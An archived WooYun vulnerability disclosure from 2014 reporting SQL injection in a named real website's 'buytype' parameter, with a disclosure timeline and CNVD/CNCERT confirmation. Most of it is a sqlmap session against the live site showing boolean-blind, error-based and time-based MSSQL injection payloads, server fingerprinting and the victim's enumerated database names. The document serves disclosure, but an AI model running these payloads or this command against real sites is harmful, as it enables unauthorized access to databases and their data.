乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-28: 细节已通知厂商并且等待厂商处理中 2014-12-03: 厂商已经确认,细节仅向厂商公开 2014-12-13: 细节向核心白帽子及相关领域专家公开 2014-12-23: 细节向普通白帽子公开 2015-01-02: 细节向实习白帽子公开 2015-01-12: 细节向公众公开
rt
http://www.66tx.cn/
[root@Hacker~]# Sqlmap sqlmap -u "http://www.66tx.cn/product/list_c300.html?buytype=2&RentPriceMin=undefined&RentPriceMax=undefined&KeyWords=55&code=&iscert=fal sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable[*] starting at 09:11:38[09:11:38] [INFO] resuming back-end DBMS 'microsoft sql server'[09:11:38] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: buytype Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) Payload: buytype=(SELECT (CASE WHEN (6348=6348) THEN 2 ELSE 6348*(SELECT 6348 FROM master..sysdatabases) END))&RentPriceMin=undefined&RentPriceMax=undefined Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: buytype=2 AND 9919=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9919=9919) THEN CHAR(49) ELSE CHAR(48) Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: buytype=2 AND 1028=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysu---[09:11:38] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008[09:11:38] [INFO] fetching database names[09:11:38] [INFO] the SQL query used returns 13 entries[09:11:38] [INFO] resumed: Air[09:11:38] [INFO] resumed: gcwzwl[09:11:38] [INFO] resumed: InsuranceProject[09:11:38] [INFO] resumed: master[09:11:38] [INFO] resumed: model[09:11:38] [INFO] resumed: msdb[09:11:38] [INFO] resumed: ReportServer[09:11:39] [INFO] resumed: ReportServerTempDB[09:11:39] [INFO] resumed: taizhang[09:11:39] [INFO] resumed: tempdb[09:11:39] [INFO] resumed: wuliu_scwl[09:11:39] [INFO] resumed: wuliu_scwl_new[09:11:39] [INFO] resumed: wuliu_yaavailable databases [13]:[*] Air[*] gcwzwl[*] InsuranceProject[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] taizhang[*] tempdb[*] wuliu_scwl[*] wuliu_scwl_new[*] wuliu_ya[09:11:39] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi[09:11:39] [INFO] fetched data logged to text files under 'H:\360?~1\SQLMAP~1.4\Bin\output\www.66tx.cn'
null
危害等级:中
漏洞Rank:10
确认时间:2014-12-03 16:07
CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。
暂无